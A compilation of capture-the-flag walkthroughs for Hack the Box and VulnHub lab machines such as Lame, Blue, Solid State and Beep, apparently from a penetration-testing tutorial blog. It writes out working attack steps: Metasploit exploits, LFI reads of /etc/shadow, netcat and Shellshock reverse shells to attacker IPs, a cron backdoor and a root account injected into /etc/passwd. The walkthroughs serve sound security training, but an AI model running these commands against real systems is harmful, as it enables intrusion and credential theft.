Let us start form getting to know the IP of VM (Here, I have it at 192.168.1.102 but you will have to find your own)

netdiscover

Use nmap for port enumeration

nmap -p- -A 192.168.1.102 --open

Nmap scan tells us that port 22 and 80 are open,as port 80 is running http we open it in our browser. When we open the ip we find a login page we use dirb to enumerate the directories and found 2 important directories called /flag/ and /admin_area/

dirb http://192.168.0.26/

We first open the flag directory and find the 1st flag.

Then we open the directory called /admin_area/.

The page itself doesn't tell much but when we take a look at the source code we find our 2nd flag and the username and password to login through the home page.

When we login through the home page, we find a page that can be used to upload files.

We create a php reverse shell payload using msfvenom and upload it to our target machine.

Now dirb scan showed us a page called uploaded_files we use an educated guess and execute our file in that directory.

Now we setup our listener before executing our shell. As soon as we execute our shell we will get the reverse shell of the target system.

msf > use multi/handler

msf exploit(multi/handler) > set payload php/meterpreter/reverse_tcp

msf exploit(multi/handler) > set lhost 192.168.0.18

msf exploit(multi/handler) > set lport 4444

msf exploit(multi/handler) > run

Now we find a file called hint.txt, when we open it we find our 3rd flag.

We find all the files that belong to user technawi, and we find a file called crendtials.txt in /etc/mysql/conf.d/credentials.txt

When we open the file we get our 4th flag and the password for user technawi.

Now we login through ssh using these credentials in the target machine.

ssh technawi@192.168.0.26

Now we open the file called flag.txt and find our 5th and final flag.

Hello friends! Today we are going to take another CTF challenge known as W1R3S.inc. The credit for making this vm machine goes to “SpecterWires” and it is another capture the flag challenge in which our goal is to gain root access and capture the flag to complete the challenge. You can download this VM here.

Let’s Breach!!!

Let’s start from getting to know the IP of VM (Here, I have it at 192.168.1.106 but you will have to find your own)

netdiscover

Now let’s move towards enumeration in context to identify running services and open of victim’s machine by using the most popular tool Nmap.

nmap -p- -A 192.168.1.106 --open

Awesome!! Nmap has done remarkable job by dumbing the details of services running on open port 21, 22 and 80.

Knowing port 80 is open in victim’s network I preferred to explore his IP in browser but didn’t get any clue on its home page for next step.

Next we use dirb tool of kali to enumerate the directories and found some important directories such as /administrator /installation and /wordpress /

dirb http://192.168.1.106 /

So next I decided to explore http://192.168.1.106/administrator/installation through browser URL and received installation page as shown in given below image. Moreover noticed that the author has used Cuppa CMS.

With the help of Google I check out for any exploit related to cuppa CMS. And from Google search result, I found exploit 25971 in its first link.

This exploit was pointing toward Cuppa CMS File Inclusion vulnerability. The exploit having hint for exploiting LFI or RFI vulnerability, taking let help from highlighted hint let’s try to exploit our victim.

According to our condition we need to paste malicious code in URL as http:192.168.1.106 /administrator/alerts/alertConfigField.php?urlConfig=../../../../../../../../../etc/passwdfor exploiting lfi vulnerability.

Sadly!! Again didn’t get anything accept following blank page of configuration.

After wasting a lot of time on browser I decided to use curl for exploiting LFI vulnerability for obtaining etc/password file.

curl -s --data-urlencode urlConfig=../../../../../../../../../etc/passwd http://192.168.1.106/administrator/alerts/alertConfigField.php

When I executed above command for exploring etc/password file, it successfully work and I found first username “w1r3s”.

Then again I executed below command for obtaining password file by using same process.

curl -s --data-urlencode urlConfig=../../../../../../../../../etc/shadow http://192.168.1.106/administrator/alerts/alertConfigField.php

Successfully I found salt password of user w1r3s as shown in given below image. Then I copied this password in a text file as pass.txt for cracking it with john the ripper.

Next I had used john the ripper for cracking pass.txtand from given below image you can observe the highlighted text “computer” as plain text password.

Hence we found username: w1r3s and password: computer

If you remember the output result of nmap then it was showing port 22 is open for SSH. We had also grabbed the username and password, now without wasting timing let login into SSH using above credential username: w1r3s and password: computer.

ssh wlr3s@192.168.1.106

Wonderful!! We have successfully access PTs shell through SSH of victims system.

lsb_release -a

Since author has given two the challenges i.e. (i) take root access (ii) capture the Flag.

Let’s take root access through sudo -i command as shown in below image.

Congratulation!!We got root login successfully.

For capturing flag I look into all directories and found flag.txt file. With help of cat command I successfully captured the flag and complete the all challenges of this vm.

ls-la

cat flag.txt

Solving challenge in this lab is not that much hectic therefore it is good task for beginners.

Hello friends!! Today we are going to solve another CTF challenge “Blocky ” which is available online for those who want to increase their skill penetration testing and black box testing. Blocky is retried vulnerable lab presented by Hack the Box for making online penetration practices according to your experience level, they have collection of vulnerable labs as challenges from beginners to Expert level. We are going to start a new series of hack the box beginning with Blocky craft which is designed for beginners.

Since these labs are online available therefore they have static IP and IP of blocky is 10.10.10.37so let’s begin with nmap port enumeration.

nmap -sV 10.10.10.37

From given below image, you can observe we found port 21, 22, 80 are open in victim’s network.

Knowing port 80 is open in victim’s network I preferred to explore his IP in browser but didn’t get any remarkable clue on its welcome page for next step.

Next we use dirb tool of kali to enumerate the directories and found some important directories such as /phpmyadmin, /wp-admin, /plugin/files and etc which you can confirm from below image.

dirb http://10.10.10.37 /

After browsing so many directories I found plugin/files a bit interested by execute following URL in browser.

http://10.10.10.37/plugin/files.

From given below image you can observe that it has shown two jar file. Let’s download blockycore.jar file and then move for its compilation.

Using online compliers I had complied blockycore.jar file and found something very interesting in it. It contains login credential sqluserand sqlpass as highlighted in below image.

Then I explore http://10.10.10.37/phpmyadminand login into phpmyadmin server using above credential root: 8YsqfCTnvxAUeduzjNSXe22

Then opened the wordpress database for stealing username from here and I found a user login: Notch with user Id 1.

Now I try to access victim’s system PTs shell through SSH since port 22 is open as per nmap result and I had also found a user name therefore I open a new terminal in kali executed following command to connecting with target network through ssh service.

ssh notch@10.10.1037

For password I try above password found in jar file and got successful login into victims shell.

From id result I came to know Notch is first user of system.

By executing sudo -l command it tell us that user Notch has full privileged in this machine.

Then I moved for root access using previous same password and again I get root access successfully.

sudo su

Then inside its home directory I found user.txt file and used cat command for reading this file.

cat user.txt

Gracefully!! We found 1^st flag of this Lab in user.txt.

Then I moved into root directory where I found root.txt and again use cat command for reading this file.

cd root

cat root.txt

Great!!! We completed this challenge by capturing 2^nd flag in root.txt file.

Hello friends!! Today we are going to solve another CTF challenge “Lame” which is lab presented by Hack the Box for making online penetration practices according to your experience level. They have collection of vulnerable labs as challenges from beginners to Expert level. HTB have two partitions of lab i.e. Active and retired since we can’t submit write up of any Active lab therefore we have chosen retried Lame lab.

Level: Beginners

Task: find user.txt and root.txt file in victim’s machine.

Let’s begin the Game!!

Since these labs are online available therefore they have static IP and IP of Lame is 10.10.10.3 so let’s begin with nmap port enumeration.

nmap -sV 10.10.10.3

From given below image, you can observe that we found so many open ports such as 21 for ftp, 22 for ssh, 139 and 445 for samba service and also got hit OS platform can be Unix or linux.

From nmap result we saw samba service smbd 3.x is running in victim’s machine therefore next I search for any exploit related to this service in Google.

Gratefully Google gave me hint in their 2^nd link of exploit DB.

Then I run msfconsolecommand in terminal and load metasploit framework for using Samba 3.0.20 < 3.0.25rc3 - 'Username' map script' Command Execution module for exploiting target machine.

use exploit/multi/samba/usermap_script

msfexploit(multi/samba/usermap_script) > set rhost 10.10.10.3

msfexploit(multi/samba/usermap_script) > exploit

Terrific!! I have got unauthorized access of victims command shell through session 1 as shown in below image.

I had updated command shell into meterpreter shell by executing following command.

session -u 1

Inside path: /home/makisI found user.txt file and used cat “file name” command for reading this file.

cd home

cd makis

cat user.txt

Great!! We got our 1^st flag successfully

Inside path: /rootI found root.txt file and used cat “file name” command for reading this file.

cd root

cat root.txt

Great!! We got our 2^st flag successfully

It will be very stress-free challenge for those candidate who have knowledge little know vulnerability analysis.

Happy Hacking!!

Hello friends!! Today we are going to solve another CTF challenge “Blue” which is lab presented by Hack the Box for making online penetration practices according to your experience level. They have collection of vulnerable labs as challenges from beginners to Expert level. HTB have two partitions of lab i.e. Active and retired since we can’t submit write up of any Active lab therefore we have chosen retried Blue lab.

Level: Beginners

Task: find user.txt and root.txt file in victim’s machine.

Let’s begin the Game!!

Since these labs are online available therefore they have static IP and IP of blue is 10.10.10.40 so let’s begin with nmap port enumeration.

nmap -sV 10.10.10.40 --open

From given below image, you can observe that we found so many open ports and port 137, 139 and 445 denotes that it is windows machine.

When I extract complete result of nmap I found following details

· OS: windows 7 professional

· Computer name: haris-pc

· NetBIOS computer name haric-pc

· Smb version: 2.02

Great!! Form this result I can conclude username can be “haris” moreover smb 2.02 can be exploit by eternal blue vulnerability.

Let confirm eternal blue vulnerability in victims system using namp script.

nmap --script vuln -p445 10.10.10.40

Awesome!!Victim’s machine is vulnerable to eternal blue exploit.

Then I run msfconsolecommand in terminal and load metasploit framework for using eternal blue module for exploiting target machine.

use exploit/windows/smb/ms17_010_eternalblue

msf exploit(windows/smb/ms17_010_eternalblue) > set rhost 10.10.10.40

msfexploit(windows/smb/ms17_010_eternalblue) >run

Terrific!! I have got unauthorized access of victims command shell through session 1 as shown in below image.

Inside c:\Users\haris \Desktop I found user.txt file and used type “file name” command for reading this file.

cd Desktop

type user.txt

Great!! We got our 1^st flag successfully

Inside c:\Users\Administrator \Desktop I found root.txt file and used type “file name” command for reading this file.

cd Desktop

type root.txt

Great!! We got our 2^st flag successfully.

It was very easy challenge for those candidate who have knowledge little know vulnerability analysis.

Happy Hacking!!

Hello friends!! Today we are going to solve another CTF challenge “Grandpa” which is lab presented by Hack the Box for making online penetration practices according to your experience level. They have collection of vulnerable labs as challenges from beginners to Expert level. HTB have two partitions of lab i.e. Active and retired since we can’t submit write up of any Active lab therefore we have chosen retried Grandpa Lab.

Level: Beginners

Task: find user.txt and root.txt file in victim’s machine.

Let’s begin the Game!!

Since these labs are online available therefore they have static IP and IP of Grandpa is 10.10.10.14 so let’s begin with nmap port enumeration.

nmap -p- -sV 10.10.10.14

From nmap result I found following information.

Open port: 80 for http

Service version: Microsoft IIS httpd 6.0

Os : Windows machine.

Then I used searcgsploit for iis 6.0 and found a Remote Buffer overflow vulnerability in Microsoft IIS httpd 6.0, you can check this exploit in google aslo.

Then I run msfconsolecommand in terminal and load metasploit framework for using Microsoft IIS WebDav ScStoragePathFromUrl Overflow module for exploiting target machine.

use exploit/windows/iis/iis_webdav_scstoragepathfromurl

msfexploit(windows/iis/iis_webdav_scstoragepathfromurl) set rhost 10.10.10.14 (target IP)

msfexploit(windows/iis/iis_webdav_scstoragepathfromurl) set payload windows/meterpreter/reverse_tcp

msfexploit(windows/iis/iis_webdav_scstoragepathfromurl) set lhost 10.10.14.3 (attacker IP)

msfexploit(windows/iis/iis_webdav_scstoragepathfromurl) set lport 4444

msfexploit(windows/iis/iis_webdav_scstoragepathfromurl) run

Terrific!! I have got unauthorized access of victims command shell through session 1 as shown in below image.

Then I run command getuidfor identify user ID and current process but it failed due to limited shell access we have in session 1 and now we need to privilege escalation.

For that backgroundyour current meterpreter shell and go for post exploitation.

Then I run a post exploit “Multi Recon Local Exploit Suggester” that suggests local meterpreter exploits that can be used for further exploit. The exploits are recommended founded on the architecture and platform that the user has a shell opened as well as the available exploits in meterpreter.

use post/multi/recon/local_exploit_suggester

msfpost(multi/recon/local_exploit_suggester) > set session 1

msfpost(multi/recon/local_exploit_suggester) > run

Wonderful!!Exploit Suggester truly proof itself by suggesting other exploit name to which target is vulnerable. So now we will go with last option as highlighted in image.

At this time use pprFlattenRec Local Privilege Escalation module for making unauthorized access again but as privileged user.

use exploit/windows/local/ppr_flatten_rec

msfexploit(windows/local/ppr_flatten_rec) > set lhost 10.10.14.3

msfexploit(windows/local/ppr_flatten_rec) > set lport 4455

msfexploit(windows/local/ppr_flatten_rec) > run

Nice!! It works and we got meterpreter session 2 as system user and you can check in below image.

Meterpreter > getuid

Now let’s complete this task my searching user.txt and root.txt flag which is hidden somewhere inside a directory.

Meterpreter > shell

Inside c:\Document and Setting\Harry\Desktop I found user.txtfile and used type “file name” command for reading this file.

cd Desktop

type user.txt

Great!! We got our 1^st flag successfully

Inside c:\Document and Setting\Administrtator \Desktop I found root.txt file and used type “file name” command for reading this file.

cd Desktop

typeroot.txt

Great!! We got our 2^st flag successfully

Breaching this lab was interesting and enjoyable moment for me. It will take less time if you are aware of proper metasploit exploits. Therefore I will give all Glory to Metasploit for making this challenge easy for me.

Happy Hacking!!

Hello friends!! Today we are going to solve another CTF challenge “Mirai” which is lab presented by Hack the Box for making online penetration practices according to your experience level. They have collection of vulnerable labs as challenges from beginners to Expert level. HTB have two partitions of lab i.e. Active and retired since we can’t submit write up of any Active lab therefore we have chosen retried Mirai lab.

Level: Intermediate

Task: find user.txt and root.txtfile in victim’s machine.

Let’s Breach!!!

Lab IP: 10.10.10.48

Firstly let’s enumerate ports in context to identify running services and open ports of victim’s machine by using the most popular tool Nmap.

nmap -p- -A 10.10.10.48 --open

Awesome!! Nmap has done remarkable job by dumping the details of services running on open port 22 53, 80, 1031, 32400, 32469.

Without wasting time I used dirb tool of kali to enumerate the directories and found some important directories such as /admin/

dirb http://10.10.10.48

So next I decided to explore http://10.10.10.48/admin through browser URL. Here we have a Login Page, Lets Go through That.

When I link on login tab I saw following web page. The Pi-hole and the Logo gives us a pretty huge hint that the target machine is a Raspberry Pi, and Raspberry Pi comes with a default ssh

So we tried default ssh credentials on the Raspberry Pi.

User: pi

Password: raspberry

Great!! Our predication works successfully and we got PTs shell of victim’s machine.

Now Let’s Look for the User Flag

cd Desktop

here I found user.txtfile and used cat “file name” command for reading this file.

cat user.txt

Great!! We got our 1^st flag successfully

And After Browsing we got the flag user.txt on the Location: ~/Desktop/user.txt

by executing sudo -l command it tell us that user pi has full privileged in this machine.

sudo -l

Then I moved for root access using previous same password and again I get root access successfully.

sudo bash

After going through the root directory we get a root.txt But we get a Hint that our Root Flag is on a USB stick.

Let’s check if it is mounted by following command df

df (abbreviation for disk free) is a standard Unix command used to display the amount of available disk space for file systems on which the invoking user has appropriate read access. As you can see in the below screenshot that we have the USB stick on the Device. (From Wikipedia)

From given below image we can /media/usbstick.

Then execute given below command for further steps

cd media/usbstick

ls-al

Here we found a text file damnit.txt, using cat command we can read this file.

cat damnit.txt

Oops!! James has accidently deleted root.txt file. Now let’s try to find it somewhere with a little hope.

Move back to root directory and type following command which will scan /dev/sdb file system completely and hopefully it can find deleted root.txt file also.

Great!! We got our 2^st flag successfully

Enjoy Hacking!!

Hello friends!! Today we are going to solve another CTF challenge “Appoclyst ” which is available online for those who want to increase their skill in penetration testing and black box testing. Blocky is retried vulnerable lab presented by Hack the Boxfor making online penetration practices according to your experience level, they have collection of vulnerable labs as challenges from beginners to Expert level. We are going to start a new series of hack the box beginning with Blocky craft which is designed for beginners.
Level: Intermediate
Task: find user.txt and root.txt file in victim’s machine.
Since these labs are online available therefore they have static IP and IP of blocky is 10.10.10.46so let’s begin with nmap port enumeration.
nmap -sV 10.10.10.46
From given below image, you can observe we found port 22, 80 are open in victim’s network.

Knowing port 80 is open in victim’s network we preferred to explore his IP in browser but didn’t get any remarkable clue on its Apocalypse Preparation blog for next step.

We have entered in the /etc folder using the cd command, than we have used cat hosts command which has given us all the live host.

Next we decided to give the name of the third host in the browser. Which has given us the Welcome page of the Apocalyst lab along with a mesaage Apocalypse Preparation Blog.

Now we decided to use wpscan –u http://apocalyst.htb/ --enumerate t --enumerate p --enumerate u command on the URL that we have entered in the browser. To check if there are any kind of vulnerable themes, plugins etc.

The wpscan has enumerated the usernames where we have found the login credentials as Falaraki.

Next we use dirb tool of kali to enumerate the directories from .txt file. The command we have used is dirb http://10.10.1046/ /root/Desktop/dict.txt .

Now that we have found an important directory named as Rightiousness in the .txt file we enumerated.

So next we decided to explore http://10.10.10.46/Rightiousness through browser URL and what we see is a image opened on the browser. As shown below.

The image got us wondering there must a clue behind. On second thought we decided to do Steganalysis on the image. Using the steghide --info image.jpgcommand in the kali terminal. And we found there is a list.txt file embedded behind the image.

Now we need to extract that list.txt file embedded behind the image. Therefore we used steghide --extract –sf image.jpgcommand for extraction. We simply need to leave the Enter passphrase option blank and Press Enter. List.txt file has successfully been extracted on our Desktop.

Again we have used wpscan to find out the password credentials for the login credentials Falaraki we earlier took using the wpscan. Here we have used wpscan –u http://10.10.1046 --username falaraki --wordlist /root/Desktop/list.txtcommand to enumerate the password from the list.txt file.

We see that for login credentials falaraki, the password credentials matched is Transclisiation.

After finding the username and password, we have used metasploit’s exploit wp_admin_shell_upload to upload the shell and get the meterpreter which is shown below.

Once we have got the meterpreter. We have used command ls –la /home to check what kind of directories are on home. Than we check inside the falaraki directory using command ls –la /home/falaraki, here we found out the user.txt file and used cat /home/falaraki/user.txt to read the file content which contains our first FLAG!!

Now we used command ls –la in the falaraki directory as shown. Here we discovered a file named .secret which left us curious to read its content using the cat .secretcommand. It contains an encoded codein base64 which we need to decode to read the content behind it.

Now to decode the encoded content in base64 we used command echo “Encoded Content” | base64 –d. This gave us decoded form of the content as shown in the image below.

Now Let’s we try access the user falaraki using ssh, here we have given command ssh falaraki@10.10.10.46. To find the root flag.

On another terminal LinEnum tool from github which is very well known for checking privilege escalation in directories. First we have downloaded the Linenum-master.zipfile from github. After that we have shared the Linenum-master folder over the server by making a simple HTTP server on port 80 using command python –m SimpleHTTPServer 80.

Now we will download the shared file using wget http://10.10.14.3/LinEnum.sh command for our falaraki@apocalyst user. Now need to give permission to LinEnum.sh using command chmod 777 Linenum.sh. Now to execute it we have given command ./LinEnum.sh .

The LinEnum tool has given all the sensitive files that can be read/write in the falaraki directory.

In a new terminal we are using openssl to make a new salted combined username and password in MD5 algorithm. For this the command used is openssl passwd -1 –salt raj pass123.

Now using vi /etc/passwd command we are editing the passwd directory for adding a new user. The for the new user is username:Salted Value of username and password:0:0:root:/root:/bin/bash , we have saved this new user by using :wq command.

Now we simply check if the user has been successfully added or not, so as to find the. For this we have used su – raj command and in password we have given the password for this user which is pass123. We are finally in the root privilege of the Apocalyst by using ls command we see a root.txt file, whose content we would like to see by using the cat root.txtcommand. Finally we found our final FLAG!!

Hello Friends!! Today we are going to solve a CTF Challenge “Solid State”. It is a lab that is featured in Hack the Box. They have an amazing collection of Online Labs on which you can practice your penetration testing skills online. They have labs ranging from beginner to Expert. Solid State is a Retired Lab.

Level: Medium

Task: Find the user.txt and root.txt in the vulnerable Lab.

Let’s Begin!

As these labs are only available online therefore they have a static IP. Solid State Lab has IP: 10.10.10.51.

Now, as always let’s begin our hacking with the port enumeration.

Command: nmap 10.10.10.51 -sV -p- --open

As you can see in the above screenshot that couple of ports open among which we have port 80, 110, 119, 4555.

The Port 80 is open so let’s open IP in out Browser to see that if a website is hosted on the IP.

After opening the IP in the browser we can see that it is a basic website nothing exited.

Now back to 4555, it runs service James Remote Admin 2.3.2. After searching a while on the internet, I got that the default password for logging in the Remote Admin is root: root.

And it is a golden rule to apply the default credentials, so let’s try to get in Remote Admin using the default credentials. For this we will use netcat as shown below in image.

nc 10.10.10.51 4555

Great we have logged in on the Remote Admin Service, after that we ran the HELP command to get the List of working commands.

Here listusers command draws our attention, let’s see what it does. Great, we have the list of mail users on the server.

Back to the HELP command we had the setpassword command. Let’s use it to change the passwords of all the users so that we can further enumerate.

Command: setpassword james 1234

Ok, so now we have the users for the POP3 service and their passwords. Now lets dig into that, for that we will use telnet.

telnet 10.10.10.51 110

User: John

Pass: 1234

LIST

After logging in using the Credentials of the user john, we ran the command LIST, which lists all the messages in jhon’s account. Let see if we find something here.

Nope hardluck !! we didn’t get much in this but lets try another users

Again open a new telnet session but this time we enter the Credentials of user Mindy.

telnet 10.10.10.51 110

User: Mindy

Pass: 1234

list

Using LIST we got the mails in the account of mindy. Let’s open to see if we can get some hint to move forward in the mail.

After opening the mail we found sent mail from admin account by Jamesto mindy sharing his the SSH Login Credentials. It is a Jackpot!!

Username:mindy

Pass:P@55W0rd12@

Let’s go and get the ssh shell of the machine and use midy credential for login into ssh.

ssh mindy@10.10.10.51

Cool!! We got access of victim’s PTS shell.

Since we have enumerated the target network and found Apache James Serer 2.3.2 is running and after Browsing through the internet we stumbled across the Exploit DB module shown below, now copy the whole python code from here.

Paste above copied python code in a text file and make following changes inside payload as highlighted in below image and then save it, we have it as exploit.py on the desktop.

nc -e /bin/sh 10.10.14.3 8000

Here 10.10.14.3 is attacker’s IP and 8000 is listening port for reverse connection from targets network.

Now run above saved python file as I run using below command:

./exploit.py 10.10.10.51

Ok Done! The Exploit will work only when someone logs in. So let’s again login into SSH shell using the user Mindy’s Credentials and as soon as we login the exploit begin to work as shown below.

Let’s open a netcat Listener to get the shell which will be generated after our exploit gets completely executed. Now we need to import the python file to reach the terminal and to do so type:

python -c "import pty; pty.spawn('/bin/bash')"

Lovely!! So again we got access of victim’s system shell but this time we had access TTys shell of his system, now let check it directory.

Here we can see user.txtwhich indicates we have almost completed our 1^st challenge.

I had use cat command for reading user.txt file and with this we had completed our first challenge.

Now let move towards 2^nd challenge for root.txt and currently we are in Mindy directory. For root.txt file we need to move into root but I have no idea for further step. Then I recall Mindy has received a mail from admin account send by James, there are chance of getting any hint from James therefore I prefer to grep running process of James by executing following command.

ps aux | grep james

Here aux will work as describe below:

a = display processes for all users
u = show the process's user/owner
x = show processes not attached to a terminal

Great!! It has shown root process for opt file.

Then I move into /opt directory and run ls-al command for exploring all files and folder inside this directory.

cd opt

ls-al

So it shown two files among which I’m interested in tmp.py file.

When I used cat command for reading this file I found a python code inside it. This code was useless for me and to me it useful I need to edit this file by adding malicious code inside it therefore let copy this code first into a text file.

As given below in image you can see I had edit netcat backdoor using following command and save the file tmp.py, then transfer this file into victim’s system.

/bin/nc -e bin/bash 10.10.14.3 8081

I tried to download our malicious tmp.py file inside /opt it get failed due to limited access therefore first I downloaded this file in /tmp directory using wget command.

wget http://10.10.14.4/tmp.py

When it get successfully downloaded then I replace it into /opt directory

cp tmp.py /opt

cd /opt

Great!! We can see tmp.py file inside /opt lets confirm this file using cat command

cat tmp.py

Yeppii!!! We had successfully uploaded our one-liner netcat backdoor in victim’s system. Now let’s start netcat in a new terminal reverse connection.

nc -lvp 8081

Then I run crontab -lcommand for reverse connection and move back netcat terminal.

At netcat you will get reverse connection after 3 minutes from the time you will run crontab command. We have the root shell. And just by using the “ls” command we successfully located the root.txt

Great!! We got our 2nd flag successfully Enjoy Hacking!!

Hello friends!! Today we are going to solve another CTF challenge “Sense” which is available online for those who want to increase their skill in penetration testing and black box testing. Blocky is retried vulnerable lab presented by Hack the Box for making online penetration practices according to your experience level, they have collection of vulnerable labs as challenges from beginners to Expert level. We are going to start a new series of hack the box beginning with Sense craft which is designed for beginners.
Level: Intermediate
Task: find user.txt and root.txt file in victim’s machine.
Since these labs are online available therefore they have static IP and IP of sense is 10.10.10.60so let’s begin with nmap port enumeration.
nmap –A 10.10.10.60 --open
From given below image, you can observe we found port 80, 443 are open in victim’s network.

Knowing port 80 is open in victim’s network we preferred to explore his IP in browser but didn’t get any remarkable clue on its PF Sense Login Portal for next step.

Now we have this Login Portal using DirBusterTool. As you can see we have given Target IP https://10.10.10.60/ in the Target URL option. And we have given the path of the directory we want to enumerate which is /usr/share/wordlists/disbuster/directory-list-2-3-medium.txt. In File Extension option we have given the format of the file which is txt . Then Click on start for BruteForcing .

After going through all the directories and file’s we came up with a conclusion that system-users.txt has the clue for our next step.

Now we have simply accessed the file using the browser by giving an input of https://10.10.10.60/system-users.txt , what we saw was a Username and Password which can be used to accessed Sense Login portal. But giving these inputs didn’t actually log us in.

This made us curious, then we decided to take a little help from google. We searched for the default username and password for PFSENSE. The result we got can be seen in image below.

Than we have given username as rohit and password as pfsense. Where r is in small letter these credentials have successfully logged us into the pfsense portal.

We figured out that we should try searching for the pfsense version which is 2.1.3 on google. And as usual it came out to be an Remote Command Execution Exploit.

Once we are assured of the username and password, we have used metasploit exploit and got the meterpreter as you can see below.

Once we have got the meterpreter. We have used command cd /home to check what kind of directories are on home. Than we check inside the rohitdirectory using command ls /home/rohit, here we found out the user.txt file and used cat user.txtto read the file content which contains our first FLAG!!

After getting our first FLAG. We have used shell command and whoami command which has displayed the current user which is root, then after getting into root directory we have used ls command which gave us the root.txt file. Whose content we would like to see by using the cat root.txt command. Finally we found our final FLAG!!

Hello friends! Today we are going to take another CTF challenge known as Bob: 1.0.1 The credit for making this vm machine goes to “c0rruptedb1t” and it is another capture the flag challenge in which our goal is to gain root access and capture the flag to complete the challenge. You can download this VM here.

Let’s Breach!!!

Let’s start from getting to know the IP of VM (Here, I have it at 192.168.1.109 but you will have to find your own)

netdiscover

Now let’s move towards enumeration in context to identify running services and open of victim’s machine by using the most popular tool Nmap.

nmap -A 192.168.1.109

Awesome!! Nmap has done remarkable job by dumbing the details of service running on open port 80. It also found the robot.txt and it showed us that it contains /login.php, /dev_shell.php /lat_memo.html, /passwords.html

Knowing port 80 is open in victim’s network I preferred to explore his IP in browser.

After this I was curious about the links inside the robots.txt so, I went on to open those. One that drew my attention was

http://192.168.1.109/dev_shell.php

It seemed like a shell, so I tried to run “ls” command.

It didn’t work and I got a Denied message “Get out skid lol”

My next try was pwd command. But even then, there was no success.

Ok, As I was about to give up on this shell, I thought to try “id” command.

At last! I had a command which could run in this shell. Now all I have to do is bypass it on order to generate a shell.

I tried “id | ls” and I have the result for the both commands. I have successfully bypassed with a single pipe (|)

As I ran the “ls” command, I saw a file “dev_shell.php.bak”. I save that file on my system.

After downloading the “dev_shell.php.bak”, I opened the file using cat command as shown in the screenshot given below.

You can see variable $bad_words, it is the list of commands which were banned in the dev_shell.php we were messing with earlier.

You can see that the netcat command is not allowed but “nc” is not in the list. So, I decided to get the shell using nc. I generated a shell using this command:

id | nc -e /bin/bash 192.168.1.132 6000

Here, 192.168.1.132 is the IP of My Kali

Before running this command, Start a netcat listener on the port 6000 to grab the shell which will be generated using the command mentioned before.

nc -lvp 6000

As soon as I ran the command on the browser, I got a limited shell on my netcat listener. Now let’s spawn a TTY Shell

python -c 'import pty;pty.spawn("/bin/bash")'

Ok this gave us a proper shell. After changing to home directory, we found the following users

After browsing through the user directories, I found something in the Elliot’s directory. I found a text file named “theadminisdumb.txt”

After opening, it was a description of the employees in the IT department and specially the admin. He says that the admin is dumb because he sets a default password on the systems “Qwerty”.

This gave us a hint that one of the users must have the password as Qwerty. Only way to find out is brute forcing manually as shown below.

su [username]

I found out that User jc has the password Qwerty. So, logged in using the jc credentials.

Now again let’s look for another clue in the user directories. After looking for a while. I found another text file in user bob’s Document Directory called staff.txt. But we also found a login.txt.gpgbut GPG or GNU Privacy Guard are the encrypted file, we are going to need a passphrase to decrypt the text file. Our next Target is to get that passphrase. We also got a Directory named Secret. Let’s get into that.

There was folder inside a folder and go on till we have a notes.sh file.

The Path for that file is /home/bob/Documents/Secret/Keep_Out/Not_Porn/No_Lookie_In_Here/notes.sh

On finding that notes.sh, I opened it using cat command. It contained Message:

Harry Potter is my faviorite

Are you the real me?

Right, I'm ordering pizza this is going nowhere

People just don't get me

Ohhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhh

Cucumber

Rest now your eyes are sleepy

Are you gonna stop reading this yet?

Time to fix the server

Everyone is annoying

Sticky notes gotta buy em

We tried a couple combination from the words in them but after some multiple guesses. Then it struck me that I could try to use the first letter of every sentence and create a word, after doing that I got the word “HARPOCRATES” On googling it I found that it has do something with secrets and password. This made me sure that it is the passphrase for the gpg file.

So time to decrypt the gpg file

gpg --batch –passphrase HARPOCRATES -d login.txt.gpg

Great! We have the bob login credentials!

Username: bob

Password: b0bcat_

Now that we have the login credentials let’s login into bob’s shell

After logging in I ran the command sudo -l which showed that we have “ALL” Permission. Now all we have to do is get on to root shell which can be done using command sudo su

After we got into the root shell all that is left is to open the root flag which can be done using command cat /flag.txt.

Hello friends!! Today we are going to solve another CTF challenge “Beep” which is available online for those who want to increase their skill in penetration testing and black box testing. Sense is retried vulnerable lab presented by Hack the Box for making online penetration practices according to your experience level, they have collection of vulnerable labs as challenges from beginners to Expert level. We are going to start a new series of hack the box beginning with Beepcraft which is designed for beginners.
Level: Intermediate
Task: find user.txt and root.txt file in victim’s machine.
Since these labs are online available therefore they have static IP and IP of sense is 10.10.10.60so let’s begin with nmap port enumeration.
nmap –A 10.10.10.7
From given below image, you can observe we found port 22,25,80,110,111,143,443,993,995,3306,4445,10000 are open in victim’s network.

Knowing port 80 is open in victim’s network we preferred to explore his IP in browser but didn’t get any remarkable clue for the next step.

As you can see we are redirected to the Elastix Login Portal in the image below.

Next we have used dirb tool of kali to enumerate the directories from .txtfile. The command we have used is dirb http://10.10.10.7/ /root/Desktop/wig.txt . After checking most of the directories, we finally decided to go for vtigercrm directory.

So next we decided to explore http://10.10.10.7/vitercrm through browser URL and what we see is another Login Portal of vtiger CRM 5 browser. After looking at the page for some clue, we saw a version of vtiger which is vtiger CRM 5.1 in the bottom left of the Webpage. As Shown Below.

Then we decided to search this version of vtigerCRM 5.1 on google. Which came out to be a Metasploits Exploit.

We have used metasploit’s exploit /vtiger_soap_uploadand got the meterpreter as you can see below.

use exploit/multi/http/vtiger_soap_upload

msfexploit(multi/http/vtiger_soap_upload) set rhost 10.10.10.7

msfexploit(multi/http/vtiger_soap_upload) set rport 443

msfexploit(multi/http/vtiger_soap_upload) set ssl true

msfexploit(multi/http/vtiger_soap_upload) exploit

Great!!! We got meterpreter session 1 opened

Once we have got the meterpreter. We have used command cd /home to check what kind of directories are on home. Then we check inside the fanisdirectory using command ls /home/fanis, here we found out the user.txt file and used cat user.txtto read the file content which contains our first FLAG!!

In the beginning we say port 10000 was also open when we scanned the IP using NMAP command. We opened the port 10000 along with the IP in the browser. This gave us a bad request, but the clicking on the URL open up the page.

Clicking on the URL given in the previous step just redirected us to Webmin login Portal as you can see in the image below.

As we don’t know the username and password credential for this portal. So we decided to use some random username’s and password’s which shows us a new directory name in the end of the URL which is session_login.cgi .

Now we decided to use curl command which is used transfer files from or to a server. So the command used is curl –k –H “user-agent: () { :; }; bash –I >& /dev/tcp/10.10.14.3/8081 0>&1” https://10.10.10.7:10000/session_login.cgi.
In this command we have given the local hosts IP, portnumber so that we can start out listenerservices using netcat command on this port and we have given victims URL.

After executing our curl command, we have simply started our listening services using netcat command nc –lvp 8081. Once we have establish a connection with the Victim Host. We used command ls to look for files, folder in the current directory.

The ls command which gave us the root.txt file. Whose content we would like to see by using the cat root.txtcommand.
Finally we found our final FLAG!!

